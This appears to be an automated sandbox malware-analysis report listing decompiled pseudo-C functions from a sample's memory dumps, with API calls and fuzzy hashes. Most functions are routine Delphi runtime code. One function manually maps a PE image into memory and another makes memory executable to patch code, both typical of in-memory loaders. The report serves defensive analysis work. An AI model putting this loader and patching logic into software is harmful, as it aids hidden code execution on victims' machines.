			L035914F0(_t116, 0xfffffffffffffff3, _t144); 								} 							} 							 *(_t159 - 4) = _t125 + 2; 							 *0x35aa710 = 0; 							return _t159; 						} 					} 				} else { 					__eflags = __cl; 					__eax =  *(__edx + 0x35aa5b8) & 0x000000ff; 					__ebx = 0x35a8040 + ( *(__edx + 0x35aa5b8) & 0x000000ff) * 8; 					if(__eflags != 0) { 						while(1) { 							__eax = 0x100; 							asm("lock cmpxchg [ebx], ah"); 							if(__eflags == 0) { 								goto L5; 							} 							__ebx = __ebx + 0x20; 							__eflags = __ebx; 							__eax = 0x100; 							asm("lock cmpxchg [ebx], ah"); 							if(__ebx != 0) { 								__ebx = __ebx + 0x20; 								__eflags = __ebx; 								__eax = 0x100; 								asm("lock cmpxchg [ebx], ah"); 								if(__ebx != 0) { 									__ebx = __ebx - 0x40; 									__eflags = __ebx; 									Sleep(0); 									__eax = 0x100; 									asm("lock cmpxchg [ebx], ah"); 									if(__eflags != 0) { 										Sleep(0xa); 										continue; 									} 								} 							} 							goto L5; 						} 					} 					L5: 					__edx =  *(__ebx + 4); 					__eax =  *(__edx + 8); 					__ecx = 0xfffffff8; 					__eflags = __edx - __ebx; 					if(__edx == __ebx) { 						__edx =  *(__ebx + 0x10); 						__ecx =  *(__ebx + 2) & 0x0000ffff; 						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax; 						__eflags = __eax -  *(__ebx + 0xc); 						if(__eax >  *(__ebx + 0xc)) { 							_push(__esi); 							_push(__edi); 							__eflags =  *0x35aa045; 							if(__eflags != 0) { 								while(1) { 									__eax = 0x100; 									asm("lock cmpxchg [0x35aa710], ah"); 									if(__eflags == 0) { 										goto L20; 									} 									Sleep(0); 									__eax = 0x100; 									asm("lock cmpxchg [0x35aa710], ah"); 									if(__eflags != 0) { 										Sleep(0xa); 										continue; 									} 									goto L20; 								} 							} 							L20: 							 *(__ebx + 1) =  *(__ebx + 1) &  *0x35aa71c; 							__eflags =  *(__ebx + 1) &  *0x35aa71c; 							if(( *(__ebx + 1) &  *0x35aa71c) == 0) { 								
__ecx =  *(__ebx + 0x18) & 0x0000ffff; 								__edi =  *0x35aa718; // 0xee390 								__eflags = __edi - ( *(__ebx + 0x18) & 0x0000ffff); 								if(__edi < ( *(__ebx + 0x18) & 0x0000ffff)) { 									__eax =  *(__ebx + 0x1a) & 0x0000ffff; 									__edi = __eax; 									__eax = E035915BC(__eax); 									__esi = __eax; 									__eflags = __eax; 									if(__eax != 0) { 										goto L33; 									} else { 										 *0x35aa710 = __al; 										 *__ebx = __al; 										_pop(__edi); 										_pop(__esi); 										_pop(__ebx); 										return __eax; 									} 								} else { 									__esi =  *0x35aa714; // 0x380e3a0 									__ecx =  *(__ebx + 0x1a) & 0x0000ffff; 									__edx = __ecx + 0xb30; 									__eflags = __edi - __ecx + 0xb30; 									if(__edi >= __ecx + 0xb30) { 										__edi = __ecx; 									} 									__esi = __esi - __edi; 									 *0x35aa718 =  *0x35aa718 - __edi; 									 *0x35aa714 = __esi; 									goto L33; 								} 							} else { 								asm("bsf eax, esi"); 								__esi = __eax * 8; 								__ecx =  *(0x35aa720 + __eax * 4); 								asm("bsf ecx, ecx"); 								__ecx =  *(0x35aa720 + __eax * 4) + __eax * 8 * 4; 								__edi = 0x35aa7a0 + ( *(0x35aa720 + __eax * 4) + __eax * 8 * 4) * 8; 								__esi =  *(__edi + 4); 								__edx =  *(__esi + 4); 								 *(__edi + 4) = __edx; 								 *__edx = __edi; 								__eflags = __edi - __edx; 								if(__edi == __edx) { 									__edx = 0xfffffffe; 									asm("rol edx, cl"); 									_t38 = 0x35aa720 + __eax * 4; 									 *_t38 =  *(0x35aa720 + __eax * 4) & 0xfffffffe; 									__eflags =  *_t38; 									if( *_t38 == 0) { 										asm("btr [0x35aa71c], eax"); 									} 								} 								__edi = 0xfffffff0; 								__edi = 0xfffffff0 &  *(__esi - 4); 								__eflags = 0xfffffff0 - 0x10a60; 								if(0xfffffff0 < 0x10a60) { 									_t52 =  &((__esi - 4)[0xfffffffffffffffc]); 									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7; 									__eflags =  *_t52; 								
} else { 									__edx = __edi; 									__edi =  *(__ebx + 0x1a) & 0x0000ffff; 									__edx = __edx - __edi; 									__eax = __edi + __esi; 									__ecx = __edx + 3; 									 *(__eax - 4) = __ecx; 									 *(__edx + __eax - 8) = __edx; 									__eax = L035914F0(__eax, __ecx, __edx); 								} 								L33: 								_t56 = __edi + 6; // 0xee396 								__ecx = _t56; 								 *(__esi - 4) = _t56; 								__eax = 0; 								 *0x35aa710 = __al; 								 *__esi = __ebx; 								 *((intOrPtr*)(__esi + 8)) = 0; 								 *((intOrPtr*)(__esi + 0xc)) = 1; 								 *(__ebx + 0x10) = __esi; 								_t61 = __esi + 0x20; // 0x380e3c0 								__eax = _t61; 								__ecx =  *(__ebx + 2) & 0x0000ffff; 								__edx = __ecx + __eax; 								 *(__ebx + 8) = __ecx + __eax; 								__edi = __edi + __esi; 								__edi = __edi - __ecx; 								__eflags = __edi; 								 *(__ebx + 0xc) = __edi; 								 *__ebx = 0; 								 *(__eax - 4) = __esi; 								_pop(__edi); 								_pop(__esi); 								_pop(__ebx); 								return __eax; 							} 						} else { 							_t19 = __edx + 0xc; 							 *_t19 =  *(__edx + 0xc) + 1; 							__eflags =  *_t19; 							 *(__ebx + 8) = __ecx; 							 *__ebx = 0; 							 *(__eax - 4) = __edx; 							_pop(__ebx); 							return __eax; 						} 					} else { 						 *(__edx + 0xc) =  *(__edx + 0xc) + 1; 						__ecx = 0xfffffff8 &  *(__eax - 4); 						__eflags = 0xfffffff8; 						 *(__edx + 8) = 0xfffffff8 &  *(__eax - 4); 						 *(__eax - 4) = __edx; 						if(0xfffffff8 == 0) { 							__ecx =  *(__edx + 4); 							 *(__ecx + 0x14) = __ebx; 							 *(__ebx + 4) = __ecx; 							 *__ebx = 0; 							_pop(__ebx); 							return __eax; 						} else { 							 *__ebx = 0; 							_pop(__ebx); 							return __eax; 						} 					} 				} 			}                        

                                                                            0x03591906
                                                                            0x03591909
                                                                            0x03591909
                                                                            0x0359190c
                                                                            0x03591910
                                                                            0x03591913
                                                                            0x03591916
                                                                            0x03591918
                                                                            0x03591918
                                                                            0x0359191a
                                                                            0x0359191d
                                                                            0x03591920
                                                                            0x03591923
                                                                            0x03591924
                                                                            0x03591925
                                                                            0x03591926
                                                                            0x03591926
                                                                            0x03591772
                                                                            0x03591772
                                                                            0x03591772
                                                                            0x03591772
                                                                            0x03591776
                                                                            0x03591779
                                                                            0x0359177c
                                                                            0x0359177f
                                                                            0x03591780
                                                                            0x03591780
                                                                            0x0359174d
                                                                            0x0359174d
                                                                            0x03591751
                                                                            0x03591751
                                                                            0x03591754
                                                                            0x03591757
                                                                            0x0359175a
                                                                            0x03591784
                                                                            0x03591787
                                                                            0x0359178a
                                                                            0x0359178d
                                                                            0x03591790
                                                                            0x03591791
                                                                            0x0359175c
                                                                            0x0359175c
                                                                            0x0359175f
                                                                            0x03591760
                                                                            0x03591760
                                                                            0x0359175a
                                                                            0x0359174b

                                                                            APIs
                                                                            • Sleep.KERNEL32(00000000), ref: 035917C0
                                                                            • Sleep.KERNEL32(0000000A,00000000), ref: 035917D6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                            • Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp
                                                                            • Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: Sleep
                                                                            • String ID:
                                                                            • API String ID: 3472027048-0
                                                                            • Opcode ID: 44a1e9f48dd0093ec581c85454cf2fb4d56766756986518bdf202d22ce9a8494
                                                                            • Instruction ID: 8c33dbe7cad5b8a44d39ddbc2358a56761746d8c99205b6284381606c691d8e8
                                                                            • Opcode Fuzzy Hash: 44a1e9f48dd0093ec581c85454cf2fb4d56766756986518bdf202d22ce9a8494
                                                                            • Instruction Fuzzy Hash: 79B10772500A628BEF15DF28E584766BBF0FB85311F0882AED4168F3B9D7709646E790
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 74%
                                                                            E035A4C2C(intOrPtr __eax, void* __ebx, intOrPtr __ecx, void* __edx, long __edi, void* __esi, void* __fp0, intOrPtr _a4) {
                                                                                intOrPtr _v8;
                                                                                intOrPtr _v12;
                                                                                void* _v16;
                                                                                void* _v20;
                                                                                intOrPtr _v24;
                                                                                intOrPtr _v28;
                                                                                long _v32;
                                                                                char _v36;
                                                                                intOrPtr _v40;
                                                                                intOrPtr _v44;
                                                                                void* _v48;
                                                                                signed int _v52;
                                                                                long _v56;
                                                                                char _v60;
                                                                                void* _t116;
                                                                                void* _t121;
                                                                                void* _t134;
                                                                                void* _t150;
                                                                                intOrPtr _t161;
                                                                                void* _t175;
                                                                                signed int _t183;
                                                                                signed int _t184;
                                                                                intOrPtr _t188;
                                                                                intOrPtr _t196;
                                                                                intOrPtr _t202;
                                                                                intOrPtr _t203;
                                                                                signed int _t207;
                                                                                signed int _t208;
                                                                                void* _t211;
                                                                                void* _t214;

                                                                                _t206 = __edi;
                                                                                _t213 = _t214;
                                                                                _push(__edi);
                                                                                _v44 = __ecx;
                                                                                _t182 = __edx;
                                                                                _v40 = __eax;
                                                                                _t196 = *0x35a40a8; // 0x35a40ac
                                                                                E03594D4C(&_v36, _t196);
                                                                                _push(_t214);
                                                                                _push(0x35a4e1a);
                                                                                _push(*[fs:eax]);
                                                                                *[fs:eax] = _t214 + 0xffffffc8;
                                                                                _v8 = *((intOrPtr*)(_v44 + 0x3c)) + _v44;
                                                                                _t116 = VirtualAlloc(__edx, *(_v8 + 0x50), 0x2000, 1); // executed
                                                                                _v16 = _t116;
                                                                                _v12 = _v16 - *((intOrPtr*)(_v8 + 0x34));
                                                                                _t121 = VirtualAlloc(_v16, *(_v8 + 0x54), 0x1000, 4); // executed
                                                                                _v48 = _t121;
                                                                                E03592D7C(_v44, _t182, *(_v8 + 0x54), _v48);
                                                                                VirtualProtect(_v48, *(_v8 + 0x54), "true", &_v56); // executed
                                                                                _t28 = _v8 + 0x18; // 0x18
                                                                                _t211 = _t28 + (*(_v8 + 0x14) & 0x0000ffff);
                                                                                _t134 = (*(_v8 + 6) & 0x0000ffff) - 1;
                                                                                if(_t134 >= 0) {
                                                                                    _v60 = _t134 + 1;
                                                                                    _t184 = 0;
                                                                                    do {
                                                                                        _t206 = *(_t211 + 8 + (_t184 + _t184 * 4) * 8);
                                                                                        _v52 = *((intOrPtr*)(_t211 + 0x10 + (_t184 + _t184 * 4) * 8));
                                                                                        if(_t206 < _v52) {
                                                                                            _t208 = _t206 ^ _v52;
                                                                                            _v52 = _v52 ^ _t208;
                                                                                            _t206 = _t208 ^ _v52;
                                                                                        }
                                                                                        _t175 = VirtualAlloc(*((intOrPtr*)(_t211 + 0xc + (_t184 + _t184 * 4) * 8)) + _v16, _t206, 0x1000, 4); // executed
                                                                                        _v48 = _t175;
                                                                                        E03593108(_v48, _t206);
                                                                                        E03592D7C(*((intOrPtr*)(_t211 + 0x14 + (_t184 + _t184 * 4) * 8)) + _v44, _t184, _v52, _v48);
                                                                                        _t184 = _t184 + 1;
                                                                                        _t66 = &_v60;
                                                                                        *_t66 = _v60 - 1;
                                                                                    } while (*_t66 != 0);
                                                                                }
                                                                                _v24 = *((intOrPtr*)(_v8 + 0x28)) + _v16;
                                                                                _v28 = _v24;
                                                                                _v36 = _v16;
                                                                                _v32 = *(_v8 + 0x50);
                                                                                _push(0);
                                                                                L0359547C();
                                                                                _t145 = *((intOrPtr*)(_v8 + 0xa0));
                                                                                if(*((intOrPtr*)(_v8 + 0xa0)) != 0) {
                                                                                    E035A4A50(_t145 + _v16, _t213);
                                                                                }
                                                                                _t147 = *((intOrPtr*)(_v8 + 0x80));
                                                                                if(*((intOrPtr*)(_v8 + 0x80)) != 0) {
                                                                                    E035A4AD0(_t147 + _v16, _t182, _t206, _t211, _t213);
                                                                                }
                                                                                _t150 = (*(_v8 + 6) & 0x0000ffff) - 1;
                                                                                if(_t150 >= 0) {
                                                                                    _v60 = _t150 + 1;
                                                                                    _t183 = 0;
                                                                                    do {
                                                                                        _push(&_v56);
                                                                                        _t207 = _t183 + _t183 * 4;
                                                                                        _push(E035A4220(*((intOrPtr*)(_t211 + 0x24 + _t207 * 8))));
                                                                                        _push(*((intOrPtr*)(_t211 + 8 + _t207 * 8)));
                                                                                        _t161 = *((intOrPtr*)(_t211 + 0xc + _t207 * 8));
                                                                                        VirtualProtect(_t161 + _v16, ??, ??, ??); // executed
                                                                                        _t183 = _t183 + 1;
                                                                                        _t102 = &_v60;
                                                                                        *_t102 = _v60 - 1;
                                                                                    } while (*_t102 != 0);
                                                                                }
                                                                                _t188 = *0x35a40a8; // 0x35a40ac
                                                                                E03595074(_a4, _t188, &_v36);
                                                                                _pop(_t202);
                                                                                *[fs:eax] = _t202;
                                                                                _push(E035A4E21);
                                                                                _t203 = *0x35a40a8; // 0x35a40ac
                                                                                return E03594E10(&_v36, _t203);
                                                                            }


                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,00000000,035A4E1A,?,?,71F80000,00000000), ref: 035A4C74
                                                                            • VirtualAlloc.KERNEL32(?,?,00001000,00000004,00000000,?,00002000,00000001,00000000,035A4E1A,?,?,71F80000,00000000), ref: 035A4C9A
                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,00001000,00000004,00000000,?,00002000,00000001,00000000,035A4E1A,?,?), ref: 035A4CC4
                                                                            • VirtualAlloc.KERNEL32(?,035A4839,00001000,00000004,?,?,?,?,?,?,00001000,00000004,00000000,?,00002000,00000001), ref: 035A4D1C
                                                                            • VirtualProtect.KERNEL32(?,?,00000000,?,00000000), ref: 035A4DE2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                            • Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp
                                                                            • Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: Virtual$Alloc$Protect
                                                                            • String ID:
                                                                            • API String ID: 655996629-0
                                                                            • Opcode ID: c6136ba8eeb4dcdab8928a1478d342c3ca41cf2cb757f2b6a11f876e00df3c54
                                                                            • Instruction ID: 992d2c816667ef5df58715b186c9753157f42d1eb841d8de2b0a85684d670fe8
                                                                            • Opcode Fuzzy Hash: c6136ba8eeb4dcdab8928a1478d342c3ca41cf2cb757f2b6a11f876e00df3c54
                                                                            • Instruction Fuzzy Hash: A271D4B9A00609EFDB00DFA9E980EAEB7F8FF48310F154065E905EB365D770EA459B50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 65%
                                                                            E0042AD08(void* __ebx, void* __esi) {
                                                                                char _v8;
                                                                                intOrPtr _v12;
                                                                                int _t12;
                                                                                intOrPtr* _t15;
                                                                                void* _t22;
                                                                                void* _t33;
                                                                                intOrPtr _t40;
                                                                                void* _t43;
                                                                                void* _t45;
                                                                                void* _t46;
                                                                                intOrPtr _t47;

                                                                                _t43 = __esi;
                                                                                _t33 = __ebx;
                                                                                _t45 = _t46;
                                                                                _t47 = _t46 + 0xfffffef8;
                                                                                _v8 = 0;
                                                                                _push(_t45);
                                                                                _push(0x42ae0b);
                                                                                _push(*[fs:eax]);
                                                                                *[fs:eax] = _t47;
                                                                                _t12 = *0x466354; // 0x60
                                                                                *0x461c30 = ~(MulDiv(8, _t12, 0x48));
                                                                                _t15 = *0x462f2c; // 0x4617c0
                                                                                if(*_t15 == 1 && E0042ACC4() == 0x80) {
                                                                                    E004047D4(&_v8, "Tahoma");
                                                                                }
                                                                                _v12 = E00423918(1);
                                                                                _push(_t45);
                                                                                _push(0x42adc3);
                                                                                _push(*[fs:eax]);
                                                                                *[fs:eax] = _t47;
                                                                                E004239B8(_v12, 0x80000002);
                                                                                _t22 = E00423A1C(_v12, _t33, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes", _t43); // executed
                                                                                _t50 = _t22;
                                                                                if(_t22 != 0) {
                                                                                    E00423C4C(_v12, &_v8, "MS Shell Dlg 2", _t50);
                                                                                    E00423988(_v12);
                                                                                }
                                                                                _pop(_t40);
                                                                                *[fs:eax] = _t40;
                                                                                _push(0x42adca);
                                                                                return E00403928(_v12);
                                                                            }


                                                                            APIs
                                                                            • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0042AD2E
                                                                              • Part of subcall function 0042ACC4: GetDC.USER32(00000000), ref: 0042ACCD
                                                                              • Part of subcall function 0042ACC4: SelectObject.GDI32(00000000,058A00B4), ref: 0042ACDF
                                                                              • Part of subcall function 0042ACC4: GetTextMetricsA.GDI32(00000000), ref: 0042ACEA
                                                                              • Part of subcall function 0042ACC4: ReleaseDC.USER32 ref: 0042ACFB
                                                                            Strings
                                                                            • Tahoma , xrefs: 0042AD50
                                                                            • MS Shell Dlg 2 , xrefs: 0042AD98
                                                                            • SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes , xrefs: 0042AD84
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: MetricsObjectReleaseSelectText
                                                                            • String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes$Tahoma
                                                                            • API String ID: 2013942131-1011973972
                                                                            • Opcode ID: c8202af20d9748dac184fdcebe63c5273684063c3cf8487cfb81228802ca49f1
                                                                            • Instruction ID: 9d3ea1dbbf15434387875305194268bf5b9a98b32bb9e77b65e1f96db536e4fd
                                                                            • Opcode Fuzzy Hash: c8202af20d9748dac184fdcebe63c5273684063c3cf8487cfb81228802ca49f1
                                                                            • Instruction Fuzzy Hash: 2211D370700114AFC710DF65E80195D7BB6EB0A304FD14076F800A7BA1DB7D9E22871A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 94%
                                                                            E004217E0(intOrPtr _a4, short _a6, intOrPtr _a8) {
                                                                                struct _WNDCLASSA _v44;
                                                                                struct HINSTANCE__* _t6;
                                                                                CHAR* _t8;
                                                                                struct HINSTANCE__* _t9;
                                                                                int _t10;
                                                                                void* _t11;
                                                                                struct HINSTANCE__* _t13;
                                                                                struct HWND__* _t15;
                                                                                long _t17;
                                                                                struct HINSTANCE__* _t19;
                                                                                CHAR* _t20;
                                                                                struct HWND__* _t22;
                                                                                CHAR* _t24;

                                                                                _t6 = *0x4657f8; // 0x400000
                                                                                *0x461c04 = _t6;
                                                                                _t8 = *0x461c18; // 0x4217d0
                                                                                _t9 = *0x4657f8; // 0x400000
                                                                                _t10 = GetClassInfoA(_t9, _t8, &_v44);
                                                                                asm("sbb eax, eax");
                                                                                _t11 = _t10 + 1;
                                                                                if(_t11 == 0 || L00406E54 != _v44.lpfnWndProc) {
                                                                                    if(_t11 != 0) {
                                                                                        _t19 = *0x4657f8; // 0x400000
                                                                                        _t20 = *0x461c18; // 0x4217d0
                                                                                        UnregisterClassA(_t20, _t19);
                                                                                    }
                                                                                    RegisterClassA(0x461bf4);
                                                                                }
                                                                                _t13 = *0x4657f8; // 0x400000
                                                                                _t24 = *0x461c18; // 0x4217d0
                                                                                _t15 = E0040730C(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000); // executed
                                                                                _t22 = _t15;
                                                                                if(_a6 != 0) {
                                                                                    _t17 = E00421724(_a4, _a8); // executed
                                                                                    SetWindowLongA(_t22, 0xfffffffc, _t17);
                                                                                }
                                                                                return _t22;
                                                                            }


                                                                            APIs
                                                                            • GetClassInfoA.USER32 ref: 00421801
                                                                            • UnregisterClassA.USER32 ref: 0042182A
                                                                            • RegisterClassA.USER32 ref: 00421834
                                                                            • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0042187F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                            • String ID:
                                                                            • API String ID: 4025006896-0
                                                                            • Opcode ID: ba9f0a0cd088f042a5653a67c0e6f88016342e97d15f47e505010de3adbd19bf
                                                                            • Instruction ID: 027158a3b90695bcfb74c3b3aa95824c4aefdb47031e860d546c877da2bcb83e
                                                                            • Opcode Fuzzy Hash: ba9f0a0cd088f042a5653a67c0e6f88016342e97d15f47e505010de3adbd19bf
                                                                            • Instruction Fuzzy Hash: 52016171B44105ABCB00FBA9EC81F9A3399E718314F144136F914E73F1EA79A88187AE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 87%
E035A4F50(void* __eax, long __ecx, void* __edx) {
    long _v16;
    void* __ebx;
    int _t3;
    void* _t8;
    void* _t14;
    long _t15;
    DWORD* _t16;

    _push(__ecx);
    _t15 = __ecx;
    _t14 = __edx;
    _t8 = __eax;
    _t3 = VirtualProtect(__eax, __ecx, 0x40, _t16); // executed
    if(_t3 != 0) {
        E03592D7C(_t14, _t8, _t15, _t8);
        FlushInstructionCache(GetCurrentProcess(), _t8, _t15);
        _t3 = VirtualProtect(_t8, _t15, _v16, _t16); // executed
    }
    return _t3;
}


                                                                            APIs
                                                                            • VirtualProtect.KERNEL32(00000000,00000005,00000040,?,00000005,?,?,035A4E54,035A4FB8), ref: 035A4F5F
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000005,00000000,00000005,00000040,?,00000005,?,?,035A4E54,035A4FB8), ref: 035A4F75
                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000005,00000000,00000005,00000040,?,00000005,?,?,035A4E54,035A4FB8), ref: 035A4F7B
                                                                            • VirtualProtect.KERNEL32(00000000,00000005,035A4FB8,?,00000000,00000000,00000005,00000000,00000005,00000040,?,00000005,?,?,035A4E54,035A4FB8), ref: 035A4F88
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                            • Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp
                                                                            • Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
                                                                            • String ID:
                                                                            • API String ID: 4115577372-0
                                                                            • Opcode ID: ac5fd2a75226c955654a40eea2f9c10799b08636886a80fed2fb8640707364b3
                                                                            • Instruction ID: e1a23b1bc05fdbb83d48aab71e7aa6dcb640bd1ecd97af4d12992e914dbb3fb7
                                                                            • Opcode Fuzzy Hash: ac5fd2a75226c955654a40eea2f9c10799b08636886a80fed2fb8640707364b3
                                                                            • Instruction Fuzzy Hash: 2BE04FA93023113AE920B2BB3C84DAB5DECEEC95B1B045426B60CDB221D964CC0941B5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 63%
E00423A1C(void* __eax, void* __ebx, void* __edx, void* __esi) {
    char _v8;
    char _v9;
    void* _v16;
    char* _t61;
    signed int _t64;
    char* _t67;
    signed int _t70;
    char* _t73;
    signed int _t76;
    signed char _t96;
    intOrPtr _t109;
    void* _t118;
    void* _t121;

    _v8 = 0;
    _t118 = __eax;
    _push(_t121);
    _push(0x423bb6);
    _push( *[fs:eax]);
    *[fs:eax] = _t121 + 0xfffffff4;
    E004047D4( &_v8, __edx);
    _t96 = E004238DC(_v8);
    if(_t96 == 0) {
        E00404CA0( &_v8, 1, 1);
    }
    _v16 = 0;
    _t61 = E00404C00(_v8);
    _t64 = RegOpenKeyExA(E00423A08(_t118, _t96), _t61, 0, 0x20019,  &_v16); // executed
    _v9 = _t64 == 0;
    if(_v9 == 0) {
        _t67 = E00404C00(_v8);
        _t70 = RegOpenKeyExA(E00423A08(_t118, _t96), _t67, 0, 0x20009,  &_v16);
        _v9 = _t70 == 0;
        if(_v9 == 0) {
            _t73 = E00404C00(_v8);
            _t76 = RegOpenKeyExA(E00423A08(_t118, _t96), _t73, 0, 1,  &_v16);
            _v9 = _t76 == 0;
            if(_v9 != 0) {
                *(_t118 + 0x18) = 1;
                if(((_t76 & 0xffffff00 |  *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) {
                    _push( *((intOrPtr*)(_t118 + 0x10)));
                    _push(E00423BD0);
                    _push(_v8);
                    E00404AC0();
                }
                E004239E4(_t118, _v8, _v16);
            }
        } else {
            *(_t118 + 0x18) = 0x20009;
            if(((_t70 & 0xffffff00 |  *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) {
                _push( *((intOrPtr*)(_t118 + 0x10)));
                _push(E00423BD0);
                _push(_v8);
                E00404AC0();
            }
            E004239E4(_t118, _v8, _v16);
        }
    } else {
        *(_t118 + 0x18) = 0x20019;
        if(((_t64 & 0xffffff00 |  *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) {
            _push( *((intOrPtr*)(_t118 + 0x10)));
            _push(E00423BD0);
            _push(_v8);
            E00404AC0();
        }
        E004239E4(_t118, _v8, _v16);
    }
    _pop(_t109);
    *[fs:eax] = _t109;
    _push(E00423BBD);
    return E0040473C( &_v8);
}


                                                                            APIs
                                                                            • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,00423BB6), ref: 00423A88
                                                                            • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019,?,00000000,00423BB6), ref: 00423AF3
                                                                            • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00000001,?,00000000,00000000,00000000,00000000,00020009,?,?,00000000,00000000,00000000,00020019), ref: 00423B58
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Open
                                                                            • String ID:
                                                                            • API String ID: 71445658-0
                                                                            • Opcode ID: fa64aabc8f2ba27a745f52475356cda600ad999c2f50812f57e3693a88520e87
                                                                            • Instruction ID: 1631747641735d97f0e726df34b4cb7d5d51ea82463f4736274f0810a2e96b2b
                                                                            • Opcode Fuzzy Hash: fa64aabc8f2ba27a745f52475356cda600ad999c2f50812f57e3693a88520e87
                                                                            • Instruction Fuzzy Hash: 4E41B170B00218BBDB11DFA5E952B9EB7F9AB44304F5144BBB445B3282CB7DAF059B48
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 72%
E0045EBB0(intOrPtr __eax, void* __ebx, intOrPtr* __ecx, char __edx, void* __esi) {
    intOrPtr _v8;
    char _v12;
    CHAR* _t24;
    struct HINSTANCE__* _t25;
    CHAR* _t28;
    intOrPtr _t33;
    intOrPtr* _t36;
    void* _t39;

    _t36 = __ecx;
    _v12 = __edx;
    _v8 = __eax;
    E00404BF0(_v8);
    E00404BF0(_v12);
    _push(_t39);
    _push(0x45ec57);
    _push( *[fs:eax]);
    *[fs:eax] = _t39 + 0xfffffff8;
    0;
    _t28 = E00404C00(_v8);
    LoadLibraryA(_t28); // executed
    *0x4666a8 = GetModuleHandleA(_t28);
    if( *0x4666a8 != 0) {
        0;
        0;
        _t24 = E00404C00(_v12);
        _t25 =  *0x4666a8; // 0x738c0000
        *_t36 = GetProcAddress(_t25, _t24);
    }
    _pop(_t33);
    *[fs:eax] = _t33;
    _push(0x45ec5e);
    return E00404760( &_v12, 2);
}


                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,0045EC57), ref: 0045EBF9
                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0045EC57), ref: 0045EC01
                                                                            • GetProcAddress.KERNEL32(738C0000,00000000), ref: 0045EC35
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressHandleLibraryLoadModuleProc
